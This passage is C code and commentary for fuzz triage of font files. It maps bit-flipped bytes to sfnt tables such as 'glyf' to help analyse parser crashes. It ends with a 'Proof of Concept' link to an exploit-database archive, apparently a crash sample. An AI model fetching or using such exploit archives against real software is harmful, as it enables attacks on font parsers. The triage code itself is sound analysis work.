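 * flipped inside 'glyf'.  Returns the number of mutated bytes attributed to 'glyf'
 * (1 for this sample), or -1 if the bookkeeping failed. */
long glyf_attribution_demo(void)
{
    static const uint8_t head[54] = { 0 };
    static const uint8_t glyf[20] = { 0x00, 0x01, 0, 0, 0, 0, 0x00, 0x10, 0x00, 0x10 };
    const char *tags[] = { "head", "glyf" };
    const uint8_t *bodies[] = { head, glyf };
    const size_t lens[] = { sizeof head, sizeof glyf };
    uint8_t orig[256], fuzz[256];
    char owner[5];

    size_t len = build_sfnt(orig, sizeof orig, 2, tags, bodies, lens);
    if (len == 0) return -1;
    memcpy(fuzz, orig, len);
    /* directory = 44 bytes, 'head' padded to 56 -> 'glyf' starts at 100; flip bit 3 of glyf+5 */
    fuzz[105] ^= 0x08;
    if (sfnt_owner(orig, len, 105, owner) != 5 || strcmp(owner, "glyf") != 0) return -1;
    if (sfnt_owner(orig, len, 98, owner) != -1) return -1;   /* padding byte after 'head' */
    return mutations_in_table(orig, fuzz, len, "glyf");
}

int main(void)
{
    printf("mutated bytes inside glyf: %ld\n", glyf_attribution_demo());
    return 0;
}
```

On real samples, read both files into buffers and call mutations_in_table once per tag from the original's directory; the offset-within-table that sfnt_owner returns is what to feed into a table-specific decoder (for glyf, the loca table maps it to a glyph index). The -2 path matters for fuzzed inputs: a directory record whose offset plus length wraps past the end of the file is exactly the kind of value a crashing parser would have trusted.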
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37915.zip